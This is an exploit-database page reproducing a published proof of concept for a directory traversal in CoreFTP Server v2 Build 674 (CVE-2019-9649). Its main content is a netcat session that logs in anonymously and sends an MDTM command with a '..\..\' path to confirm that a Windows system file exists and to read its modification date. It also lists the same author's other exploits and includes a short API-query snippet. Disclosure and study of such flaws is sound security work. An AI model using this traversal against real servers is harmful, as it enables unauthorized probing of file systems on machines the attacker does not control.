Search for hundreds of thousands of exploits

"Core FTP Server FTP / SFTP Server v2 Build 674 - 'MDTM' Directory Traversal"

Author

Exploit author

"Kevin Randall"

Platform

Exploit platform

windows

Release date

Exploit published date

2019-03-13

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
# Exploit Title: CoreFTP Server FTP / SFTP Server v2 - Build 674  MDTM Directory Traversal
# Google Dork: N/A
# Date: 3/13/2019
# Exploit Author: Kevin Randall
# Vendor Homepage: https://www.coreftp.com
# Software Link: http://www.coreftp.com/server/index.html
# Version: Firmware: CoreFTP Server FTP / SFTP Server v2 - Build 674
# Tested on: Windows 7
# CVE : CVE-2019-9649

*Vendor has confirmed vulnerability and implemented an updated version*

Summary: Summary: By utilizing a directory traversal along with the FTP MDTM command, an attacker can browse outside the root directory to determine if a file exists based on return file size along with the date the file was last modified by using a ..\..\ technique
Tools used:
Parrot OS VM
Windows 7 VM
FTP / SFTP Server v2 - Build 674
Netcat

Proof of Concept (PoC):

File 1: ARP.exe
Type of file: Application(.EXE)
Description: TCP/IP Arp Command
Location: C:\Windows\System32\
Size: 20.5 KB (20,992 bytes)
Size on disk: 24.0 KB (24,576 bytes)
Created: Monday July 13, 2009 7:55:11 PM
Modified: Monday July 13, 2009, 9:14:12 PM
Accessed: Monday July 13, 2009 7:55:11 PM

#nc -nv 192.168.0.2 21
(UNKNOWN) [192.168.0.2] 21 (ftp) open
220 Core FTP Server Version 2.0, build 674, 32-bit, installed 1 days ago Unregistered
USER anonymous
331 password required for anonymous
PASS anonymous@
230-Logged on
230
MDTM C:\..\..\..\..\..\..\Windows\System32\ARP.exe
213 20090713211412
Release DateTitleTypePlatformAuthor
2020-03-11"CoreFTP 2.0 Build 674 MDTM - Directory Traversal (Metasploit)"remotewindows"Kevin Randall"
2020-03-11"CoreFTP 2.0 Build 674 SIZE - Directory Traversal (Metasploit)"remotewindows"Kevin Randall"
2019-12-17"Netgear R6400 - Remote Code Execution"webappshardware"Kevin Randall"
2019-11-18"Lexmark Services Monitor 2.27.4.0.39 - Directory Traversal"webappshardware"Kevin Randall"
2019-06-04"DVD X Player 5.5 Pro - Local Buffer Overflow (SEH)"localwindows"Kevin Randall"
2019-04-30"Freefloat FTP Server 1.0 - 'SIZE' Remote Buffer Overflow"remotewindows"Kevin Randall"
2019-04-30"Freefloat FTP Server 1.0 - 'STOR' Remote Buffer Overflow"remotewindows"Kevin Randall"
2019-03-26"Titan FTP Server Version 2019 Build 3505 - Directory Traversal / Local File Inclusion"webappswindows"Kevin Randall"
2019-03-13"Core FTP Server FTP / SFTP Server v2 Build 674 - 'MDTM' Directory Traversal"doswindows"Kevin Randall"
2019-03-13"Core FTP Server FTP / SFTP Server v2 Build 674 - 'SIZE' Directory Traversal"doswindows"Kevin Randall"
2018-08-30"DLink DIR-601 - Credential Disclosure"webappshardware"Kevin Randall"
2018-04-02"DLink DIR-601 - Admin Password Disclosure"webappshardware"Kevin Randall"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46534/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.